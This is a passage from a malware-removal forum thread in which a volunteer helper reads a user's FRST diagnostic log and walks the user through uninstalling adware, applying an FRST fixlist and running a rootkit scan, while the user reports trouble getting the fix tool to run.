Task: {FF68EC2C-3B0C-4266-A221-56BDB11B6623} - System32\Tasks\{9F1E4A2B-AEA4-4565-A49A-E488006A3FAF} => pcalua.exe -a C:\Users\BR\Downloads\Mach3Version3.043.066.exe -d C:\Users\BR\Downloads
Task: C:\Windows\Tasks\Adobe Flash Player Updater.job => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe
Task: C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
Task: C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe

==================== Loaded Modules (whitelisted) =============

2012-12-15 12:55 - 2005-03-12 00:07 - 00087040 _____ () C:\Windows\System32\pdfcmnnt.dll
2014-09-26 14:41 - 2014-09-26 14:41 - 01021088 _____ () C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CoreSyncExtension\CoreSync_x64.dll
2014-12-24 16:13 - 2014-12-24 16:13 - 00678968 _____ () C:\Program Files (x86)\HitsBlender\hitsblender.exe
2014-09-26 14:40 - 2014-09-26 14:40 - 06237856 _____ () C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CoreSync\CoreSync.exe
2014-10-11 13:06 - 2014-10-11 13:06 - 00073544 _____ () C:\Program Files (x86)\Common Files\Apple\Apple Application Support\zlib1.dll
2014-10-11 13:05 - 2014-10-11 13:05 - 01044776 _____ () C:\Program Files (x86)\Common Files\Apple\Apple Application Support\libxml2.dll
2014-12-24 16:13 - 2014-12-24 16:13 - 00725504 _____ () C:\Program Files (x86)\HitsBlender\libGLESv2.dll
2014-12-24 16:13 - 2014-12-24 16:13 - 00143872 _____ () C:\Program Files (x86)\HitsBlender\libmpg123.dll
2014-12-24 16:13 - 2014-12-24 16:13 - 00042496 _____ () C:\Program Files (x86)\HitsBlender\libEGL.dll
2014-12-24 16:13 - 2014-12-24 16:13 - 00874496 _____ () C:\Program Files (x86)\HitsBlender\platforms\qwindows.dll
2014-12-24 16:13 - 2014-12-24 16:13 - 00023552 _____ () C:\Program Files (x86)\HitsBlender\imageformats\qico.dll
2014-12-24 16:13 - 2014-12-24 16:13 - 00023552 _____ () C:\Program Files (x86)\HitsBlender\imageformats\qgif.dll
2014-12-24 16:13 - 2014-12-24 16:13 - 00241152 _____ () C:\Program Files (x86)\HitsBlender\imageformats\qjpeg.dll
2014-12-24 16:13 - 2014-12-24 16:13 - 00220672 _____ () C:\Program Files (x86)\HitsBlender\imageformats\qmng.dll
2014-09-28 21:01 - 2014-09-28 21:01 - 36730032 _____ () C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CEF\libcef.dll
2014-11-23 16:20 - 2014-08-26 17:47 - 01491968 _____ () C:\Program Files (x86)\Common Files\Wondershare\Wondershare Helper Compact\DAQExp.dll
2014-11-23 16:20 - 2014-05-19 17:19 - 00137728 _____ () C:\Program Files (x86)\Common Files\Wondershare\Wondershare Helper Compact\CBSCreateVC.dll
2009-10-22 18:50 - 2009-10-22 18:50 - 00931112 _____ () c:\Program Files (x86)\Hewlett-Packard\TouchSmart\Media\Kernel\CLML\CLMediaLibrary.dll
2014-09-28 21:01 - 2014-09-28 21:01 - 00746160 _____ () C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CEF\libglesv2.dll
2014-09-28 21:01 - 2014-09-28 21:01 - 00136368 _____ () C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CEF\libegl.dll
2013-08-07 07:46 - 2014-12-09 09:15 - 03758192 _____ () C:\Program Files (x86)\Mozilla Firefox\mozjs.dll
2014-05-03 08:33 - 2014-05-03 08:33 - 16351920 _____ () C:\Windows\SysWOW64\Macromed\Flash\NPSWF32_13_0_0_206.dll

==================== Alternate Data Streams (whitelisted) =========

(If an entry is included in the fixlist, only the Alternate Data Streams will be removed.)

AlternateDataStreams: C:\Users\BR\Documents\Aluminum Fabricated Tables.eml:OECustomProperty
AlternateDataStreams: C:\Users\BR\Documents\P.O. For tumble weed(0).eml:OECustomProperty
AlternateDataStreams: C:\Users\BR\Documents\P.O. For tumble weed.eml:OECustomProperty
AlternateDataStreams: C:\Users\BR\Documents\reaper pic sept(0).eml:OECustomProperty
AlternateDataStreams: C:\Users\BR\Documents\reaper pic sept.eml:OECustomProperty
AlternateDataStreams: C:\Users\BR\Documents\Re_ 1965 Chevrolet Corvette on UsedCorvettesOnline.com(0).eml:OECustomProperty
AlternateDataStreams: C:\Users\BR\Documents\Re_ 1965 Chevrolet Corvette on UsedCorvettesOnline.com.eml:OECustomProperty

==================== Safe Mode (whitelisted) ===================

(If an item is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)

HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\78723285.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\89621689.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\PEVSystemStart => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\procexp90.Sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\78723285.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\89621689.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\PEVSystemStart => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\procexp90.Sys => ""="Driver"

==================== EXE Association (whitelisted) =============

(If an entry is included in the fixlist, the default will be restored. None default entries will be removed.)


==================== MSCONFIG/TASK MANAGER disabled items =========

(Currently there is no automatic fix for this section.)

MSCONFIG\Services: AdobeARMservice => 2
MSCONFIG\Services: AdobeFlashPlayerUpdateSvc => 3
MSCONFIG\Services: BackupService => 2
MSCONFIG\Services: CoordinatorServiceHost => 3
MSCONFIG\Services: CrossLoopService => 2
MSCONFIG\Services: FLEXnet Licensing Service => 3
MSCONFIG\Services: FLEXnet Licensing Service 64 => 3
MSCONFIG\Services: GameConsoleService => 3
MSCONFIG\Services: gupdate => 2
MSCONFIG\Services: gupdatem => 3
MSCONFIG\Services: HP Health Check Service => 2
MSCONFIG\Services: hpqwmiex => 3
MSCONFIG\Services: LightScribeService => 2
MSCONFIG\Services: LMIGuardianSvc => 2
MSCONFIG\Services: LMIMaint => 2
MSCONFIG\Services: LogMeIn => 2
MSCONFIG\Services: MozillaMaintenance => 3
MSCONFIG\Services: Skype C2C Service => 2
MSCONFIG\Services: SkypeUpdate => 2
MSCONFIG\Services: SolidWorks Licensing Service => 3
MSCONFIG\Services: SQLANYs_SmpParts => 2
MSCONFIG\Services: tvnserver => 3
MSCONFIG\Services: YahooAUService => 2
MSCONFIG\startupfolder: C:^ProgramData^Microsoft^Windows^Start Menu^Programs^Startup^HP Digital Imaging Monitor.lnk => C:\Windows\pss\HP Digital Imaging Monitor.lnk.CommonStartup
MSCONFIG\startupreg: Adobe ARM => "C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe"
MSCONFIG\startupreg: DownloadManager => "C:\Program Files (x86)\Zoom Downloader\DownloadManager.exe" /as
MSCONFIG\startupreg: HP Remote Solution => %ProgramFiles%\Hewlett-Packard\HP Remote Solution\HP_Remote_Solution.exe
MSCONFIG\startupreg: HP Software Update => C:\Program Files (x86)\HP\HP Software Update\HPWuSchd2.exe
MSCONFIG\startupreg: HPADVISOR => C:\Program Files (x86)\Hewlett-Packard\HP Advisor\HPAdvisor.exe view=DOCKVIEW
MSCONFIG\startupreg: hpqSRMon => C:\Program Files (x86)\HP\Digital Imaging\bin\hpqSRMon.exe
MSCONFIG\startupreg: hpsysdrv => c:\program files (x86)\hewlett-packard\HP odometer\hpsysdrv.exe
MSCONFIG\startupreg: InstallIQUpdater => "C:\Program Files (x86)\W3i\InstallIQUpdater\InstallIQUpdater.exe" /silent /autorun
MSCONFIG\startupreg: msnmsgr => "C:\Program Files (x86)\Windows Live\Messenger\msnmsgr.exe" /background
MSCONFIG\startupreg: PC-Doctor for Windows localizer => C:\Program Files\PC-Doctor for Windows\localizer.exe
MSCONFIG\startupreg: SmartMenu => C:\Program Files\Hewlett-Packard\HP MediaSmart\SmartMenu.exe /background

========================= Accounts: ==========================

Administrator (S-1-5-21-998330651-303224156-1059126384-500 - Administrator - Disabled)
bcom (S-1-5-21-998330651-303224156-1059126384-1003 - Administrator - Enabled) => C:\Users\bcom
BR (S-1-5-21-998330651-303224156-1059126384-1004 - Administrator - Enabled) => C:\Users\BR
BRIAN (S-1-5-21-998330651-303224156-1059126384-1000 - Administrator - Enabled) => C:\Users\BRIAN
Guest (S-1-5-21-998330651-303224156-1059126384-501 - Limited - Disabled)

==================== Faulty Device Manager Devices =============

Name: Teredo Tunneling Pseudo-Interface
Description: Microsoft Teredo Tunneling Adapter
Class Guid: {4d36e972-e325-11ce-bfc1-08002be10318}
Manufacturer: Microsoft
Service: tunnel
Problem: : This device cannot start. (Code10)
Resolution: Device failed to start. Click "Update Driver" to update the drivers for this device.
On the "General Properties" tab of the device, click "Troubleshoot" to start the troubleshooting wizard.

Name: Photosmart C6100 series
Description: Photosmart C6100 series
Class Guid:
Manufacturer:
Service:
Problem: : The drivers for this device are not installed. (Code 28)
Resolution: To install the drivers for this device, click "Update Driver", which starts the Hardware Update wizard.

Name: HP Officejet Pro 8620
Description: HP Officejet Pro 8620
Class Guid: {4d36e971-e325-11ce-bfc1-08002be10318}
Manufacturer: HP
Service:
Problem: : This device is disabled. (Code 22)
Resolution: In Device Manager, click "Action", and then click "Enable Device". This starts the Enable Device wizard. Follow the instructions.


==================== Event log errors: =========================

Application errors:
==================

System errors:
=============
Error: (12/31/2014 11:02:55 AM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: The Google Update Service (gupdate) service failed to start due to the following error:
%%2

Error: (12/31/2014 10:58:14 AM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: The LogMeIn Kernel Information Provider service failed to start due to the following error:
%%3

Error: (12/31/2014 10:56:01 AM) (Source: DCOM) (EventID: 10010) (User: )
Description: {AD3EDBCA-0901-415B-82E9-C16D3B65E38C}


Microsoft Office Sessions:
=========================

CodeIntegrity Errors:
===================================
  Date: 2013-08-19 17:29:16.352
  Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume2\ComboFix\catchme.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

  Date: 2013-08-19 17:29:16.243
  Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume2\ComboFix\catchme.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

  Date: 2013-08-19 17:29:16.134
  Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume2\ComboFix\catchme.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

  Date: 2013-08-19 17:29:16.024
  Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume2\ComboFix\catchme.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

  Date: 2013-08-10 22:01:10.731
  Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume2\ComboFix\catchme.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

  Date: 2013-08-10 22:01:10.622
  Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume2\ComboFix\catchme.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

  Date: 2013-08-10 22:01:10.528
  Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume2\ComboFix\catchme.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

  Date: 2013-08-10 22:01:10.419
  Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume2\ComboFix\catchme.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

  Date: 2013-08-10 10:17:06.624
  Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume2\ComboFix\catchme.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

  Date: 2013-08-10 10:17:06.530
  Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume2\ComboFix\catchme.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.


==================== Memory info ===========================

Processor: Intel® Core™2 Quad CPU Q8300 @ 2.50GHz
Percentage of memory in use: 34%
Total physical RAM: 7133.18 MB
Available physical RAM: 4698.62 MB
Total Pagefile: 14264.54 MB
Available Pagefile: 11693.72 MB
Total Virtual: 8192 MB
Available Virtual: 8191.85 MB

==================== Drives ================================

Drive c: (HP) (Fixed) (Total:920.39 GB) (Free:752.46 GB) NTFS
Drive d: (FACTORY_IMAGE) (Fixed) (Total:11.02 GB) (Free:1.59 GB) NTFS ==>[System with boot components (obtained from reading drive)]
Drive f: (WD Unlocker) (CDROM) (Total:0.01 GB) (Free:0 GB) UDF
Drive k: (My Book) (Fixed) (Total:2794.49 GB) (Free:2794.03 GB) NTFS

==================== MBR & Partition Table ==================

========================================================
Disk: 0 (Size: 931.5 GB) (Disk ID: 1549F232)
Partition 1: (Active) - (Size=100 MB) - (Type=07 NTFS)
Partition 2: (Not Active) - (Size=920.4 GB) - (Type=07 NTFS)
Partition 3: (Not Active) - (Size=11 GB) - (Type=07 NTFS)
Attempted reading MBR returned 0 bytes.
 Could not read MBR for disk 1.

==================== End Of Log ============================

 

My computer started to have a pop up (YOURFILE DOWNLOAD) after I started AdwCleaner , I had this befor about two weeks ago no mater what I do can not move it off my screen untill I reboot?

just went into a few sites, still getting popup adds


Edited by RUSTY2, 31 December 2014 - 01:23 PM.

  • 0

#8
BrianDrab

BrianDrab

    Trusted Helper

  • Malware Removal
  • 3,591 posts

Thanks for the logs. We should be able to rid you of the yourfile downloader issue on this round. Do you use the HitsBlender program?

 

Step#1 - Uninstalls
Please uninstall the following programs one at a time. Instructions for doing so are here.

 

If any of the programs give you an error during the uninstall, notate it and move on to the next one. Just let me know which ones had issues. If you are asked to reboot, answer No until all the programs have been uninstalled and then you can reboot. All of these programs are either outdated, malware/adware, have a bad reputation or are not recommended. If you absolutely must have one of them I suggest that you wait until you are declared clean before reinstalling.

 

Java 7 Update 71 (you will have the opportunity to update this later if you actually use it)
Zoom Downloader

Free Download Packages
Deal Ply Removal Tool
InstallConverter

 

Step#2 - FRST Fix
NOTICE: This script was written specifically for this user, for use on that particular machine. Running this on another machine may cause damage to your operating system
1. Download attached file and save it to the Desktop. Attached File  fixlist.txt   2.96KB   328 downloads
Note. It's important that both files, FRST64 and fixlist.txt are in the same location or the fix will not work (in this case...the desktop).
2. Run FRST64 by Right-Clicking on the file and choosing Run as administrator.
3. Press the Fix button just once and wait. If for some reason the tool needs a restart, please make sure you let the system restart normally. After that let the tool complete its run.
4. When finished FRST64 will generate a log on the Desktop (Fixlog.txt). Please post the contents of it in your reply.
 

Step#3 - FRST Registry Search
1. Run FRST64 by Right-Clicking on the file and choosing Run as administrator.
2. Copy and paste the word
Chrome into the Search box and click the Search Registry button.
    Search.JPG
3. When the scan is complete a notepad window will open with the results. Please copy and paste the contents in your next reply. If for some reason notepad doesn't open the file should be
    saved on your desktop named Search.txt.

 

 

Step#4 - File Identification
1. Run FRST64 by Right-Clicking on the file and choosing Run as administrator.
2. Copy the word Chrome and paste it into the Search box of the FRST window.
3. Click the Search Files button.
4. When the search is done it will open a notepad window with the results. Please copy/paste the contents of this window into your next post.

 

 

Step#5 - Rootkit Scan
1. Download aswMBR to your desktop.
2. Right-click on aswMBR.exe and select Run as administrator to run it.
3. If you get a question about Virtualization Technology, answer Yes.
4. If you see this question: Would you like to download latest Avast! virus definitions?" say "Yes".
5. Click the "Scan" button to start scan.
6. On completion of the scan click "Save log", save it to your desktop and post in your next reply.
NOTE. aswMBR will create MBR.dat file on your desktop. This is a copy of your MBR. Do NOT delete it.

 

   

 

Items for your next post

1. FRST Fix log

2. Registry Search log

3. File search log

4. Rootkit Scan log


  • 0

#9
RUSTY2

RUSTY2

    Member

  • Topic Starter
  • Member
  • PipPipPip
  • 221 posts

Thanks for the logs. We should be able to rid you of the yourfile downloader issue on this round. Do you use the HitsBlender program?

 

Step#1 - Uninstalls
Please uninstall the following programs one at a time. Instructions for doing so are here.

 

If any of the programs give you an error during the uninstall, notate it and move on to the next one. Just let me know which ones had issues. If you are asked to reboot, answer No until all the programs have been uninstalled and then you can reboot. All of these programs are either outdated, malware/adware, have a bad reputation or are not recommended. If you absolutely must have one of them I suggest that you wait until you are declared clean before reinstalling.

 

Java 7 Update 71 (you will have the opportunity to update this later if you actually use it)
Zoom Downloader

Free Download Packages
Deal Ply Removal Tool
InstallConverter

 

Step#2 - FRST Fix
NOTICE: This script was written specifically for this user, for use on that particular machine. Running this on another machine may cause damage to your operating system
1. Download attached file and save it to the Desktop. attachicon.giffixlist.txt
Note. It's important that both files, FRST64 and fixlist.txt are in the same location or the fix will not work (in this case...the desktop).
2. Run FRST64 by Right-Clicking on the file and choosing Run as administrator.
3. Press the Fix button just once and wait. If for some reason the tool needs a restart, please make sure you let the system restart normally. After that let the tool complete its run.
4. When finished FRST64 will generate a log on the Desktop (Fixlog.txt). Please post the contents of it in your reply.
 

Step#3 - FRST Registry Search
1. Run FRST64 by Right-Clicking on the file and choosing Run as administrator.
2. Copy and paste the word
Chrome into the Search box and click the Search Registry button.
    Search.JPG
3. When the scan is complete a notepad window will open with the results. Please copy and paste the contents in your next reply. If for some reason notepad doesn't open the file should be
    saved on your desktop named Search.txt.

 

 

Step#4 - File Identification
1. Run FRST64 by Right-Clicking on the file and choosing Run as administrator.
2. Copy the word Chrome and paste it into the Search box of the FRST window.
3. Click the Search Files button.
4. When the search is done it will open a notepad window with the results. Please copy/paste the contents of this window into your next post.

 

 

Step#5 - Rootkit Scan
1. Download aswMBR to your desktop.
2. Right-click on aswMBR.exe and select Run as administrator to run it.
3. If you get a question about Virtualization Technology, answer Yes.
4. If you see this question: Would you like to download latest Avast! virus definitions?" say "Yes".
5. Click the "Scan" button to start scan.
6. On completion of the scan click "Save log", save it to your desktop and post in your next reply.
NOTE. aswMBR will create MBR.dat file on your desktop. This is a copy of your MBR. Do NOT delete it.

 

   

 

Items for your next post

1. FRST Fix log

2. Registry Search log

3. File search log

4. Rootkit Scan log

Hi Brian,

Uninstalled all but two, the Zoom Downloader gave this message

an error occurred while trying to uninstall Zoom . It may have already been uninstalled. would you like to remove Zoom from progame list?

I said NO

the scond programe was  The Free Download Package , I could not find it on the Programe list?

From ther I downloaded the  fixlist.txt   and put on to my desktop . But when I ran the FRST64 it said that the TXt file has to be in the same location? not sure how to do that. Tried copy and paste the txt. still the same message.

I did not continue with anything else being that I could not get the FRST64 going


  • 0

#10
BrianDrab

BrianDrab

    Trusted Helper

  • Malware Removal
  • 3,591 posts

Go ahead and attempt to uninstall Zoom Downloader again but answer yes to remove it from the list. The second one was my fault. The actual full name is CDBurnerXP Free Download Packages. Please remove this one.

 

The reason you are getting the message with FRST64 is because the FRST64 and fixlist have to be in the same location. Currently FRST64.exe is in your Downloads folder. I would suggest you move this file to your desktop and then run the fix from that location.

 

Thank you.


  • 0

Advertisements


#11
RUSTY2

RUSTY2

    Member

  • Topic Starter
  • Member
  • PipPipPip
  • 221 posts

Go ahead and attempt to uninstall Zoom Downloader again but answer yes to remove it from the list. The second one was my fault. The actual full name is CDBurnerXP Free Download Packages. Please remove this one.

 

The reason you are getting the message with FRST64 is because the FRST64 and fixlist have to be in the same location. Currently FRST64.exe is in your Downloads folder. I would suggest you move this file to your desktop and then run the fix from that location.

 

Thank you.

Hi Brian, took care of the files but still having trouble running FRST64 , I do have them both on my desktop but it still get the error message . Do any of the boxes in the optional scan have to be checked?


  • 0

#12
BrianDrab

BrianDrab

    Trusted Helper

  • Malware Removal
  • 3,591 posts

What I would do in this case is the following.

 

1. Reboot your machine.

2. Re-Download FRST64.exe and save this to your Desktop. If asked to overwrite the one that is there please answer Yes.

3. Re-Download the fixlist.txt that I attached and save to your Desktop. If asked to overwrite the one that is there please answer Yes.

4. Open up FRST64.exe and click the Fix button.

 

That should do it.

 

 

 


  • 0

#13
RUSTY2

RUSTY2

    Member

  • Topic Starter
  • Member
  • PipPipPip
  • 221 posts

What I would do in this case is the following.

 

1. Reboot your machine.

2. Re-Download FRST64.exe and save this to your Desktop. If asked to overwrite the one that is there please answer Yes.

3. Re-Download the fixlist.txt that I attached and save to your Desktop. If asked to overwrite the one that is there please answer Yes.

4. Open up FRST64.exe and click the Fix button.

 

That should do it.

 

 

 

ok did all that same deal , I must be doing something incorrect . when I download the txt file it goes into my notepad and I placed it in my desktop is this correct?


  • 0

#14
BrianDrab

BrianDrab

    Trusted Helper

  • Malware Removal
  • 3,591 posts

Correct. When looking on your desktop you should see both FRST64 and fixlist. Do you?

 

Capture.JPG


  • 0

#15
RUSTY2

RUSTY2

    Member

  • Topic Starter
  • Member
  • PipPipPip
  • 221 posts

Correct. When looking on your desktop you should see both FRST64 and fixlist. Do you?

 

Capture.JPG

yes just like that ?


  • 0






Similar Topics

0 user(s) are reading this topic

0 members, 0 guests, 0 anonymous users

As Featured On:

Microsoft Yahoo BBC MSN PC Magazine Washington Post HP